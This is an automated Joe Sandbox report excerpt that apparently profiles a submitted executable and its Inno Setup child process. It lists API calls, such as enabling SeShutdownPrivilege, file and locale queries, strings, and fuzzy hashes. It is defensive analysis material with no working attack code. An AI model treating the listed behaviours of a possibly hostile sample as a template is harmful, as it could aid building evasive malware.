GetCurrentProcess.KERNEL32(00000028), ref: 0040911B
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00409121
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0040913D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00409164
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00409169

Part of subcall function 004090EC: MessageBoxA.USER32 ref: 00409106

6CF44E70.USER32(00000002,00000000), ref: 0040917D

Strings

SeShutdownPrivilege, xrefs: 00409136

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupMessageOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3685916817-3733053543
Opcode ID: 766c9eae409e4428d95651925f21777e1d2dbafd31ccba6e4e2cdc7febf8915c
Instruction ID: 1409d14ab55289f2435dae64a009ab5e175d67aad5efb1a6462be2348c7f8ed4
Opcode Fuzzy Hash: 766c9eae409e4428d95651925f21777e1d2dbafd31ccba6e4e2cdc7febf8915c
Instruction Fuzzy Hash: 81F0E170784303B5F610B6A28D0BF1B619C5B94708F50843FBA54B91C3D67D9C04866F

Uniqueness

Uniqueness Score: -1.00%

Function 004026C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 004026CE

Strings

Svwo, xrefs: 004026F5

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: SystemTime
String ID: Svwo
API String ID: 2656138-368310346
Opcode ID: ea6675ebeb63a0a9a47573394461451ad3244f368073b02e8c46e04122ef07d3
Instruction ID: 2fd9a68c0dbde603d2fbf043753412ebb29498d380aade495149b20e3fa82795
Opcode Fuzzy Hash: ea6675ebeb63a0a9a47573394461451ad3244f368073b02e8c46e04122ef07d3
Instruction Fuzzy Hash: 4FE04F21E0010A42C704ABA5CD435FDF7AEEB95600B044172A418E92E0F631C251C788

Uniqueness

Uniqueness Score: -1.00%

Function 00405224 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,00405426,?,?,?,00000000,004055D8), ref: 00405237

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: eb3e0916f1d71d5523292608d7c4fdaba2307163a6013ecd43750e715832a1e9
Instruction ID: f191d8b0d38a375b14df503665a713a894c54af53dc9b6ff6a74be687c9ceae4
Opcode Fuzzy Hash: eb3e0916f1d71d5523292608d7c4fdaba2307163a6013ecd43750e715832a1e9
Instruction Fuzzy Hash: FDD05E7630D2502AE224559B2D85EBB4B9CCEC57A4F14407EF698D6241D2248C069F75

Uniqueness

Uniqueness Score: -1.00%

Function 00405CC0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,004065BC,00000000,004065CA,?,?,?,?,?,00409840), ref: 00405CCE

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: c32652c1b1593bb30748bbc4056ea64814b159bbfb85160acb9b97b753e4a0b1
Instruction ID: 738d4c6cecaf4369c0bc5e2911b44b455e14ff8adc38ffec7b6cb45b6c001f0b
Opcode Fuzzy Hash: c32652c1b1593bb30748bbc4056ea64814b159bbfb85160acb9b97b753e4a0b1
Instruction Fuzzy Hash: FEC0126040470147E3105F319C01A1632D46744314F840539A9A4A13D1D77C80118A9A

Uniqueness

Uniqueness Score: -1.00%

Function 00408280 Relevance: .5, Instructions: 487COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d46861f72bd8009182a5df1658e23b09de12010c81d0541c91a6dece14fe47d
Instruction ID: 11d40fada485c2470b6a3a131edfdc2b239a2a3c8694e8f38adb2eb1082f5e0b
Opcode Fuzzy Hash: 8d46861f72bd8009182a5df1658e23b09de12010c81d0541c91a6dece14fe47d
Instruction Fuzzy Hash: 59221D75E04219CFCB04CF99C980AEEBBB2FF88314F24416AD855B7345DB38A946CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00406E78 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00406F7D,?,0040BDC8), ref: 00406EA1
6CAD5550.KERNEL32(00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00406F7D,?,0040BDC8), ref: 00406EA7
RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00406F7D,?,0040BDC8), ref: 00406EF5

Strings

.DEFAULT\Control Panel\International, xrefs: 00406ECC
Control Panel\Desktop\ResourceLocale, xrefs: 00406F04
GetUserDefaultUILanguage, xrefs: 00406E97
Locale, xrefs: 00406EE4
kernel32.dll, xrefs: 00406E9C

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseD5550HandleModule
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 2067295843-2401316094
Opcode ID: 77f5281c4cd470c3d6529e739a59bc6e6209f341416de1e9850045565e45bd5b
Instruction ID: 6f0d4f6a2a682bef317bb0001553abdf6b97c4845b88f0a12c11f913521364e1
Opcode Fuzzy Hash: 77f5281c4cd470c3d6529e739a59bc6e6209f341416de1e9850045565e45bd5b
Instruction Fuzzy Hash: DF216F30A0020AABCB00EAA5DC52B9FB7B8AB44304F61447BA512F72C5DB78AA10865C

Uniqueness

Uniqueness Score: -1.00%

Function 00403B3B Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON

Download Yara Rule

APIs

6CAD5CA0.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403BC2
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403BE6
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403C02
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403C23
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403C4C
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403C56
GetStdHandle.KERNEL32(000000F5), ref: 00403C76
GetFileType.KERNEL32(?,000000F5), ref: 00403C8D
CloseHandle.KERNEL32(?,?,000000F5), ref: 00403CA8
GetLastError.KERNEL32(000000F5), ref: 00403CC2

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: File$HandlePointer$CloseErrorLastReadSizeType
String ID:
API String ID: 2587015848-0
Opcode ID: 82afb3ba326b040618bb1f5d1ace889cbe7170a3c7233cc425c4da9df6c52ac5
Instruction ID: e865e415cc3bddce3264ca3c3b1bb7a8c5c6c551cb095d29116a0d7d95c160d9
Opcode Fuzzy Hash: 82afb3ba326b040618bb1f5d1ace889cbe7170a3c7233cc425c4da9df6c52ac5
Instruction Fuzzy Hash: 8141A1712086009EF7344F258909B237DE8EB4471AF208A3FA5D6FA6E1D7BD9A05874D

Uniqueness

Uniqueness Score: -1.00%

Function 00405390 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,004055D8,?,?,?,?,00000000,00000000,00000000,?,004065B7,00000000,004065CA), ref: 004053AA

Part of subcall function 004051D8: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040B4BC,00000001,?,004052A3,?,00000000,00405382), ref: 004051F6

Part of subcall function 00405224: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,00405426,?,?,?,00000000,004055D8), ref: 00405237

Strings

mmmm d, yyyy, xrefs: 0040549B
m/d/yy, xrefs: 00405479
:mm, xrefs: 0040558C
AMPM, xrefs: 00405575
:mm:ss, xrefs: 004055A6

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: InfoLocale$DefaultSystem
String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
API String ID: 1044490935-665933166
Opcode ID: 32e2cd6b4f7abd5ff8e1db0b88a9d00ca1a8aeb6f8e3409cce644bf8720f9a05
Instruction ID: 5dbce1740f669969ed804a55b507669df95a3cbb205332ef81c892f85f4d3f5c
Opcode Fuzzy Hash: 32e2cd6b4f7abd5ff8e1db0b88a9d00ca1a8aeb6f8e3409cce644bf8720f9a05
Instruction Fuzzy Hash: 90512D34B005487BDB04EBA59C81A9F77AADB88304F60947BB501BB3C7DA3DDA059B5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040375C Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403796
SysAllocStringLen.OLEAUT32(?,00000000), ref: 004037A1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004037B4
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 004037BE
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004037CD

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: eb62cbe69baa29a5e4c1cf22c4c0667e8de5313a1947b2c584ac2803d2fbc60e
Instruction ID: 4467adfd160ef2e886eef196ede4891b71e87803e826c11556a0c4038ec11822
Opcode Fuzzy Hash: eb62cbe69baa29a5e4c1cf22c4c0667e8de5313a1947b2c584ac2803d2fbc60e
Instruction Fuzzy Hash: A4F044A13442843AE56075A65C43FAB198CCB41B6AF10457FF704FA1C2D8B89D05927D

Uniqueness

Uniqueness Score: -1.00%

Function 00402CCC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

RtlUnwind.KERNEL32(?,00402DA8,?,00000000,0000000F,?,?,?,?), ref: 00402DA3

Strings

p[@, xrefs: 00402D70
\[@, xrefs: 00402CEA

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Unwind
String ID: \[@$p[@
API String ID: 3419175465-328296950
Opcode ID: 10763b3ca4e2304a2a9a7d746383f13e1759796fccc72d9a9d1eb84cde97f303
Instruction ID: 4e34e1b9b67335c333c83c85b531455ae4cd4c13f1293b8a75d41d0fde5a4390
Opcode Fuzzy Hash: 10763b3ca4e2304a2a9a7d746383f13e1759796fccc72d9a9d1eb84cde97f303
Instruction Fuzzy Hash: 1E3160742042019FC714DF05CA88A27B7E5FF88714F1585BAE948AB3E1C775EC42DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403018 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

RtlUnwind.KERNEL32(?,0040303C,00000000,00000000), ref: 00403037

Strings

d\@, xrefs: 00403070
p[@, xrefs: 0040304E

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Unwind
String ID: d\@$p[@
API String ID: 3419175465-2501423739
Opcode ID: cf052ca5a1dfdc8996027feea02f07a474dc396ed8bdb9d7668b73762b1fe144
Instruction ID: cb865691cce5fd3c7a7f640cb22bbe848836da1b56ac3702cd8c9ca671f9cc7d
Opcode Fuzzy Hash: cf052ca5a1dfdc8996027feea02f07a474dc396ed8bdb9d7668b73762b1fe144
Instruction Fuzzy Hash: C31182352046029BD724DE18CA89B2777B5AB44744F24C13AA404AB3DAC77CDC41A7A9

Uniqueness

Uniqueness Score: -1.00%

Function 004030DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00409836), ref: 004030E3
GetCommandLineA.KERNEL32(00000000,00409836), ref: 004030EE

Strings

U1hd.@, xrefs: 00403103

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CommandHandleLineModule
String ID: U1hd.@
API String ID: 2123368496-2904493091
Opcode ID: dc37779357fa3c8f6d3c103c1a1d04ce0330030a2a249e6f734b52dac6989e3b
Instruction ID: fc6106ec3918557feb9e8595d18864a5322139aa66bf0d8c86619f258e517ec6
Opcode Fuzzy Hash: dc37779357fa3c8f6d3c103c1a1d04ce0330030a2a249e6f734b52dac6989e3b
Instruction Fuzzy Hash: 04C002745413408AD76CAFB69E4A70A3994E785309F40883FA218BE3F1DB7C4605ABDD

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: is-DTRND.tmpPID: 6048, Parent PID: 2148COMMON

Execution Graph

Execution Coverage:	13%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	122

Executed Functions

Function 00468C28 Relevance: 70.9, APIs: 4, Strings: 36, Instructions: 852timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00455B64: GetLocalTime.KERNEL32(?,00000000,00455CEB,?,?,0048DF10,00000000), ref: 00455B94

LocalFileTimeToFileTime.KERNEL32(-00000034,00000004,00000000,00469B46,?,00000000,00469B8F,?,00000000,00469CC8,?,00000000,?,00000000,?,0046A60E), ref: 00468E67

Part of subcall function 00453494: FindClose.KERNEL32(00000000,000000FF,00468E7E,00000000,00469B46,?,00000000,00469B8F,?,00000000,00469CC8,?,00000000,?,00000000), ref: 004534AA

Part of subcall function 00467170: FileTimeToLocalFileTime.KERNEL32(00000001), ref: 00467178
Part of subcall function 00467170: FileTimeToSystemTime.KERNEL32(?,?,00000001), ref: 00467187

Part of subcall function 0042C81C: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C840

Part of subcall function 00452DC4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00452F9B,?,00000000,0045305F), ref: 00452EEB

Strings

.tmp, xrefs: 004694C0
Installing the file., xrefs: 00469412
Incrementing shared file count (64-bit)., xrefs: 00469A1E
Will register the file (a DLL/OCX) later., xrefs: 004699B1
Time stamp of existing file: %s, xrefs: 00468F3D
Same time stamp. Skipping., xrefs: 0046925E
Version of existing file: (none), xrefs: 00469203
-- File entry --, xrefs: 00468C7B
Time stamp of our file: (failed to read), xrefs: 00468EB9
Failed to strip read-only attribute., xrefs: 004693DC
Failed to read existing file's MD5 sum. Proceeding., xrefs: 004691D9
Dest file exists., xrefs: 00468ECD
, xrefs: 004690E1, 004692A9, 00469327
Incrementing shared file count (32-bit)., xrefs: 00469A37
Same version. Skipping., xrefs: 004691EE
Version of our file: (none), xrefs: 0046900E
User opted not to overwrite the existing file. Skipping., xrefs: 00469356
InUn, xrefs: 0046964E
Skipping due to "onlyifdestfileexists" flag., xrefs: 00469403
Dest file is protected by Windows File Protection., xrefs: 00468DFF
Existing file's MD5 sum matches our file. Skipping., xrefs: 004691BE
Version of existing file: %u.%u.%u.%u, xrefs: 0046908E
Dest filename: %s, xrefs: 00468DCD
Time stamp of existing file: (failed to read), xrefs: 00468F49
Existing file is a newer version. Skipping., xrefs: 00469114
Time stamp of our file: %s, xrefs: 00468EAD
Existing file is protected by Windows File Protection. Skipping., xrefs: 004692F5
Existing file's MD5 sum is different from our file. Proceeding., xrefs: 004691CD
Skipping due to "onlyifdoesntexist" flag., xrefs: 00468EE0
User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046939F
Will register the file (a type library) later., xrefs: 004699A5
@, xrefs: 00468D28
Stripped read-only attribute., xrefs: 004693D0
Version of our file: %u.%u.%u.%u, xrefs: 00469002
Existing file has a later time stamp. Skipping., xrefs: 004692D8
Couldn't read time stamp. Skipping., xrefs: 0046923E

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Time$File$Local$CloseFindFullNamePathQuerySystemValue
String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's MD5 sum is different from our file. Proceeding.$Existing file's MD5 sum matches our file. Skipping.$Failed to read existing file's MD5 sum. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing the file.$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
API String ID: 2131814033-2710193735
Opcode ID: 6e3a96cfeceefe7b27e12024ddd28e240c815b03a9fa938ebaff2c66f8be18b2
Instruction ID: 26ed265d38906795b16b4e49dacc61d4c42806bb9d11969e3a6df92dda3e5e8a
Opcode Fuzzy Hash: 6e3a96cfeceefe7b27e12024ddd28e240c815b03a9fa938ebaff2c66f8be18b2
Instruction Fuzzy Hash: CF826230E042489FDF11DFA5C985BDDBBB5AF05304F1440ABE844AB392E7B99E45CB1A

Uniqueness

Uniqueness Score: -1.00%

Function 00423CD4 Relevance: 21.4, APIs: 14, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e909df29738598a04013bb39bd27b24a383e67e3b68f24d36dbb0c3175277ce
Instruction ID: b4035ffc14ca3d091803c165bcf49985a0577d761eaa36a67f266a584e3b78e4
Opcode Fuzzy Hash: 0e909df29738598a04013bb39bd27b24a383e67e3b68f24d36dbb0c3175277ce
Instruction Fuzzy Hash: C2E15D30700124EFDB14DF9AE585A5AB7B0EB48345F9580AAF409DB353C63CEE42DB29

Uniqueness

Uniqueness Score: -1.00%

Function 00461280 Relevance: 15.6, APIs: 4, Strings: 4, Instructions: 1612
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00488530: GetWindowRect.USER32 ref: 00488546

LoadBitmapA.USER32 ref: 0046164F

Part of subcall function 0041D778: GetObjectA.GDI32(?,00000018,?), ref: 0041D7A3

Part of subcall function 004610DC: SHGetFileInfo.SHELL32([rG,00000010,?,00000160,00001010), ref: 00461179
Part of subcall function 004610DC: ExtractIconA.SHELL32(00400000,00000000,?), ref: 0046119F
Part of subcall function 004610DC: SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 004611FB
Part of subcall function 004610DC: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00461221

Part of subcall function 00460A8C: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00461704,00000000,00000000,00000000,00400000,STOPIMAGE,0000000C,00000000), ref: 00460AA4

Part of subcall function 0048873C: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00488746

Part of subcall function 00488490: 72E5AC50.USER32(00000000,?,?,?), ref: 004884B0
Part of subcall function 00488490: SelectObject.GDI32(?,00000000), ref: 004884D3
Part of subcall function 00488490: 72E5B380.USER32(00000000,?,00488523,0048851C,?,00000000,?,?,?), ref: 00488516

Part of subcall function 0048872C: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00488736

GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,021F9654,021FB27C,?,?,021FB2AC,?,?,021FB2FC,?), ref: 004622D5
AppendMenuA.USER32 ref: 004622E6
AppendMenuA.USER32 ref: 004622FE

Part of subcall function 0042A124: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A13A

Strings

STOPIMAGE, xrefs: 00461644
[rG, xrefs: 00461549, 0046155D
, xrefs: 00461711
(Default), xrefs: 00462867

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Menu$AppendExtractFileIconInfoObject$B380BitmapCallbackDispatcherLoadMessageRectSelectSendSystemUserWindow
String ID: $(Default)$STOPIMAGE$[rG
API String ID: 3668695379-3431441485
Opcode ID: 982b526855ebd0df1b8752aac8a3729627e6a5dcf2e6983e687b878e04c3e5a3
Instruction ID: d5e5c569bf6f5c9efe25e75cdb34261cfe5831a07cd567faab00c28eae44b740
Opcode Fuzzy Hash: 982b526855ebd0df1b8752aac8a3729627e6a5dcf2e6983e687b878e04c3e5a3
